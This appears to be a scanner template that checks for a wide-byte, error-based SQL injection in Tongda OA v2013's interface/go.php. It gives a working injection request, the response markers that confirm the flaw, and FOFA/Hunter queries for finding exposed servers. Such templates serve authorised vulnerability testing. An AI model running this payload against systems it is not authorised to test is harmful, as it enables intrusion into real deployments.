product: 通达OA
vName: 通达OA v2013 interface-go.php宽字节报错注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 通达OA v2013 interface/go.php宽字节报错注入
version: ''
note: ''
search:
  FOFA: app="TDXK-通达OA"
  Hunter: app.name="通达 OA"
protocol: http
link: https://baijiahao.baidu.com/s?id=1722749185213172939&wfr=spider&for=pc
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /interface/go.php?APP_UNIT=1%df'and extractvalue(1,concat(0x5c,MD5(123456)))-- -
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - XPATH syntax error
              - e10adc3949ba59abbe56e057f20f883e
            logic: and